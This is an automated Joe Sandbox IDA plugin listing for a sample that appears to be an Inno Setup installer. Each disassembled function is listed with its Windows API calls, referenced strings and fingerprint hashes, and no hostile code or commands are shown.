                                                                                    • Instruction Fuzzy Hash: 17C117A2B102010BD714AE7DDC8476EBA999BC5316F18827FF214EB3D6DA7CDD058348
                                                                                    APIs
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F8FDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWrite
                                                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                    • API String ID: 390214022-3304407042
                                                                                    • Opcode ID: 72d01abfe8e5969de7e26bb812fea71a54af99fa0a185ea00ff7a95313d2a991
                                                                                    • Instruction ID: 2223d5580d9881282453f8846468d4fa0c2eade89701c8d1d1552e55bc4b479c
                                                                                    • Opcode Fuzzy Hash: 72d01abfe8e5969de7e26bb812fea71a54af99fa0a185ea00ff7a95313d2a991
                                                                                    • Instruction Fuzzy Hash: A6811E34A0060DAFDF10EBA4C986BEEBBB5FF88304F504465E600B7291DB79AE45CB55
                                                                                    APIs
                                                                                      • Part of subcall function 00407828: GetCurrentThreadId.KERNEL32 ref: 0040782B
                                                                                    • GetTickCount.KERNEL32 ref: 0040739F
                                                                                    • GetTickCount.KERNEL32 ref: 004073B7
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004073E6
                                                                                    • GetTickCount.KERNEL32 ref: 00407411
                                                                                    • GetTickCount.KERNEL32 ref: 00407448
                                                                                    • GetTickCount.KERNEL32 ref: 00407472
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004074E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 3968769311-0
                                                                                    • Opcode ID: fa560ec336dd6435e73473a6e2aefd0ccb444b59d075b010f8b419752d8e835c
                                                                                    • Instruction ID: 7eaf3b8bd419559424612c501055e418296922ef1fbe2de70383ecb09e47f5c1
                                                                                    • Opcode Fuzzy Hash: fa560ec336dd6435e73473a6e2aefd0ccb444b59d075b010f8b419752d8e835c
                                                                                    • Instruction Fuzzy Hash: 67414F71A0C3559ED721AE38C48431FBFD1AB80354F14893EE8D8973C2E778A8859757
                                                                                    APIs
                                                                                    • PeekMessageW.USER32 ref: 005A2DF0
                                                                                    • IsWindowUnicode.USER32 ref: 005A2E04
                                                                                    • PeekMessageW.USER32 ref: 005A2E27
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005A2E3D
                                                                                    • TranslateMessage.USER32 ref: 005A2EC2
                                                                                    • DispatchMessageW.USER32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 005A2ECF
                                                                                    • DispatchMessageA.USER32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 005A2ED7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2190272339-0
                                                                                    • Opcode ID: fd761d7266132de43e7474990c2049500dae5730ede02df76ae55a535cf0bf77
                                                                                    • Instruction ID: d2fd1ee5a8e11b9fb307f93f8c6e517243e3696a9ac5cec3ed267a911c5f8ddb
                                                                                    • Opcode Fuzzy Hash: fd761d7266132de43e7474990c2049500dae5730ede02df76ae55a535cf0bf77
                                                                                    • Instruction Fuzzy Hash: AB21D63034434176EB31A92D0D47BBFAF9E6F97748F24441EF481DB282CAD698D68226
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32(00000000,005B2942,?,?,?,00000001,00000000,?,00619EC3,0066978C,?,00650D35,?,?,00000000,00650DBE), ref: 005B285F
                                                                                    • GetFocus.USER32(00000000,005B2942,?,?,?,00000001,00000000,?,00619EC3,0066978C,?,00650D35,?,?,00000000,00650DBE), ref: 005B2867
                                                                                    • RegisterClassW.USER32 ref: 005B2888
                                                                                    • ShowWindow.USER32(00000000,00000008,00000000,00400000,00000000,41146400,00000000,00000000,00000000,00000000,80000000,00000000,00400000,00000000,00000000,00000000), ref: 005B2920
                                                                                    • SetFocus.USER32(00000000,00000000,005B2942,?,?,?,00000001,00000000,?,00619EC3,0066978C,?,00650D35,?,?,00000000), ref: 005B2927
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FocusWindow$ActiveClassRegisterShow
                                                                                    • String ID: TWindowDisabler-Window
                                                                                    • API String ID: 495420250-1824977358
                                                                                    • Opcode ID: dc80fc215540cc4eafb9e960a5d421e476d6a1d8b1644f478aa1b5a7317f9f00
                                                                                    • Instruction ID: d82140f50c977c4be84b76ca69f426c0dffd831fcdb5b5c939c24f55dbe8d353
                                                                                    • Opcode Fuzzy Hash: dc80fc215540cc4eafb9e960a5d421e476d6a1d8b1644f478aa1b5a7317f9f00
                                                                                    • Instruction Fuzzy Hash: 1921D171B10701ABE320EF65DD02F9A7AE5FB45B04F504529F904FB2D0EAB8BC9087A5
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DBEC
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC05
                                                                                    • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC2F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0063DC4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandle$AttributesCloseCreateModule
                                                                                    • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                                                    • API String ID: 791737717-340263132
                                                                                    • Opcode ID: 904617a2e49037e787060e302256d2bfdad1cab1979f73791d96504fdcffd84e
                                                                                    • Instruction ID: 6026778cd775b34b266e918d1895d9f5e5aeea77bfc3c582f4084562949ce8b5
                                                                                    • Opcode Fuzzy Hash: 904617a2e49037e787060e302256d2bfdad1cab1979f73791d96504fdcffd84e
                                                                                    • Instruction Fuzzy Hash: AD11A9A175030526E62032AA6CC7FBBA14E8B51758F14023ABA54D72D2EDD99D4282DA
APIs
• GetDC.USER32 ref: 005B8F29
  • Part of subcall function 004DD0C0: EnterCriticalSection.KERNEL32(?,00000000,004DD32F,?,?), ref: 004DD108
• SelectObject.GDI32(006125F0,00000000), ref: 005B8F4B
• GetTextExtentPointW.GDI32(006125F0,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005B8F5F
• GetTextMetricsW.GDI32(006125F0,?), ref: 005B8F81
• ReleaseDC.USER32(00000000,006125F0), ref: 005B8F9E
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005B8F56
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 1334710084-222967699
• Opcode ID: 958775d07e3e9b45620c2f21b6b018f80563130afb076ad44b94cc2abff4fe22
• Instruction ID: 51f75fe6070d711ca219fc08ac8bc05be8c07b0fd7becc7a938aa07a23ceff98
• Opcode Fuzzy Hash: 958775d07e3e9b45620c2f21b6b018f80563130afb076ad44b94cc2abff4fe22
• Instruction Fuzzy Hash: 28016D76B14608AFDB01DBE9CD41EEEB7BDEB49714F500466BA00D3281DAB8AD10C764
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083E9
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083EF
• GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 0040840A
• WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 00408410
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: FileHandleWrite
• String ID: Error$Runtime error at 00000000
• API String ID: 3320372497-2970929446
• Opcode ID: 92e6fdd24f1f60eb182b72c0aadb941e414bd13305f3c1d9f226be0fde595ab1
• Instruction ID: 8a17602c2e75a12023cfcc5c7f70c251d3057b547bf485000fb7f9983d30ebe3
• Opcode Fuzzy Hash: 92e6fdd24f1f60eb182b72c0aadb941e414bd13305f3c1d9f226be0fde595ab1
• Instruction Fuzzy Hash: 1AF046B0640341B9E720BB616D07F1A3A4D4740F26F00053FF550B93C2DEFA4A88836D
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0042CBBD
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0042CBD9
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0042CC12
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0042CC8F
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0042CCA8
• VariantCopy.OLEAUT32(?,?), ref: 0042CCE3
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
• Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
• Instruction ID: b9c2064567b20e793381e804e5bc2438c092fd9c167849d7407d8daf0e01c371
• Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
• Instruction Fuzzy Hash: 1951CA75A006299BCB22DB99D9C1BDDB3FCAF4C304F8041DAE509E7211D634AF858F69
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00646290
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0064F22D,00000000,0064FB5F), ref: 006462BF
• GetWindowLongW.USER32(?,000000EC), ref: 006462D4
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 006462FB
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00646314
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00646335
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: 56e9fd127e5b8df3264884d8cb962e5cf8db3fc3bd665bacd5c80e76b0042ab2
• Instruction ID: 4dd900cc12852a0d25872cc702cb4c4dd59defd6bf464013fc66fcb0f6f5a345
• Opcode Fuzzy Hash: 56e9fd127e5b8df3264884d8cb962e5cf8db3fc3bd665bacd5c80e76b0042ab2
• Instruction Fuzzy Hash: F0112E35344701BFCB00DB68DD91FD237E9AB1A355F0452A5F645DB3B2CAB8E8809B44
APIs
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00404872
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 00404878
• GetStdHandle.KERNEL32(000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00404897
• WriteFile.KERNEL32(00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 0040489D
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 004048B4
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 004048BA
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: FileHandleWrite
• String ID:
• API String ID: 3320372497-0
• Opcode ID: 4a542bbfe69cf2b8d6e1af26e7d435816e64742c81cc072ed4eb12002cc2b380
• Instruction ID: 9db4a11d59ebcb307a3cfeeab30a2223b0d8a9ead0fdef3697f8df52dc81456b
• Opcode Fuzzy Hash: 4a542bbfe69cf2b8d6e1af26e7d435816e64742c81cc072ed4eb12002cc2b380
• Instruction Fuzzy Hash: 3C01A9E26053103EF610FB6A9D86F5B2ADC8B4576AF10463B7218F31D2C9389D44937E
APIs
• Sleep.KERNEL32(00000000,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257), ref: 0040403F
• Sleep.KERNEL32(0000000A,00000000,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD,00000000,00000220,0042715C,?,004271AA), ref: 00404055
• Sleep.KERNEL32(00000000,?,-00000004,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD,00000000,00000220,0042715C), ref: 00404083
• Sleep.KERNEL32(0000000A,00000000,?,-00000004,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD,00000000,00000220,0042715C), ref: 00404099
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: aa65c037b8b16099025df41b79eb0bd70fabd568e44aaae4c7f43dd737f2b1a1
                                                                                    • Instruction ID: f1ec43ae1c30d41b10cc41b48195bce38923192b9b407a0b5587fa379d4d1d3c
                                                                                    • Opcode Fuzzy Hash: aa65c037b8b16099025df41b79eb0bd70fabd568e44aaae4c7f43dd737f2b1a1
                                                                                    • Instruction Fuzzy Hash: 1FC136B2A002618FC715CF69E884316BFE5ABC5311F0882BFE555AB3D1C3B8DA41DB94
APIs
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600BE9
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600C10
• SetForegroundWindow.USER32(?), ref: 00600C21
• DefWindowProcW.USER32(?,?,?,?,00000000,00600EE8,?,00000000,00600F26), ref: 00600ED3
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 00600D5B
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: MessagePostWindow$ForegroundProc
• String ID: Cannot evaluate variable because [Code] isn't running yet
• API String ID: 602442252-3182603685
• Opcode ID: 3fce2995ff52617cc64c320909660141712ed5c555b9955e6d286241251052a9
• Instruction ID: ab36fd57ef67da6a4d73ccec4cc41cbfff4955b2beb65bb6a2c22b7cd4e29d0d
• Opcode Fuzzy Hash: 3fce2995ff52617cc64c320909660141712ed5c555b9955e6d286241251052a9
• Instruction Fuzzy Hash: 65911134644204AFE719DF58CD61F9ABBBAEB89700F1584AAF804AB3E1C675AD40CF14
APIs
• UnhandledExceptionFilter.KERNEL32(?,00000000), ref: 00407C7E
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID: (lB$X7@$iB
• API String ID: 3192549508-2475287703
• Opcode ID: 626a379a1801ecfc05b34fbfd2420f4cb3f5b81a3a160e2aedf08c5b78c8ff59
• Instruction ID: 9b8732aad967581ee1cfddc98b064603106c7b26d23cb4f63de0fa6512a07937
• Opcode Fuzzy Hash: 626a379a1801ecfc05b34fbfd2420f4cb3f5b81a3a160e2aedf08c5b78c8ff59
• Instruction Fuzzy Hash: 3C417F71A0C2059FE720DF14D884B2BB7A5EF94314F15856AE549AB3D1C738FC82CB6A
APIs
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AE7
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AF7
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID: .tmp$_iu$jd
• API String ID: 3498533004-1802150322
• Opcode ID: a0223c2dfc578305c0dddc432aeb03b296bc242cc522b57ea9052b2c607b4f5e
• Instruction ID: 3061496996edbf0f295552ba256b7f5cd8ef57c15fc1c95d12c7dd96c3447177
• Opcode Fuzzy Hash: a0223c2dfc578305c0dddc432aeb03b296bc242cc522b57ea9052b2c607b4f5e
• Instruction Fuzzy Hash: 9C31A430A4021DABDB10EBA5C846BEEBBB4FF45314F10417AF640B72D2DA786E059758
APIs
  • Part of subcall function 005A3A28: GetCursorPos.USER32 ref: 005A3A2F
• SetTimer.USER32 ref: 005A3B9F
• GetCurrentThreadId.KERNEL32 ref: 005A3BD9
• WaitMessage.USER32(00000000,005A3C1D,?,?,?,00000000), ref: 005A3BFD
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: CurrentCursorMessageThreadTimerWait
• String ID: $/Z$D0f
• API String ID: 3909455694-26430867
• Opcode ID: d78b845be59367d3e209cbd22b0e30c63a83b27645a5c60fd08de3d69e42f648
• Instruction ID: e22e41007f1cd188d3129f5814c38c56834451e257cf5d477a750d23bbd2f832
• Opcode Fuzzy Hash: d78b845be59367d3e209cbd22b0e30c63a83b27645a5c60fd08de3d69e42f648
• Instruction Fuzzy Hash: F4415E30A04248EFDB51DFA8D896B9DBBF6FB46318F5584A9F804A7291C7B45F44CB20
APIs
  • Part of subcall function 005A2A3C: SetWindowTextW.USER32(?,00000000), ref: 005A2A6D
• ShowWindow.USER32(?,00000005,00000000,006505BC,?,?,00000000), ref: 0065034E
  • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
  • Part of subcall function 00421594: SetCurrentDirectoryW.KERNEL32(00000000,?,00650376,00000000,00650583,?,?,00000005,00000000,006505BC,?,?,00000000), ref: 0042159F
  • Part of subcall function 005B0518: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005B05AD,?,?,?,00000001,?,005FB63E,00000000,005FB6A9), ref: 005B054D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
• Opcode ID: 062fbde91890a9c7c71bdbdaff0e6b149ef8273d17b618ac53844c83cbed721d
• Instruction ID: f4c181762cbf351847136a24d252f6132ab9ebf6a138c6ef489f4fabac20360c
• Opcode Fuzzy Hash: 062fbde91890a9c7c71bdbdaff0e6b149ef8273d17b618ac53844c83cbed721d
• Instruction Fuzzy Hash: 5A416F34A006099FD700EFA8CD569AEBFB6FB89300F508465F900B7791DA75AE05DF51
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006445EE,?,?,00000005,00000000,00000000,?,00650C25,00000000,00650DD8,?,00000000,00650E3C), ref: 00644527
• GetLastError.KERNEL32(00000000,00000000,00000000,006445EE,?,?,00000005,00000000,00000000,?,00650C25,00000000,00650DD8,?,00000000,00650E3C), ref: 00644530
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: Created temporary directory: $\_setup64.tmp$_isetup
• API String ID: 1375471231-2952887711
• Opcode ID: cac10ad592e500dbc9321eb5b0c6fa4350d4f5f3ada15836020bf4f1a565dd9d
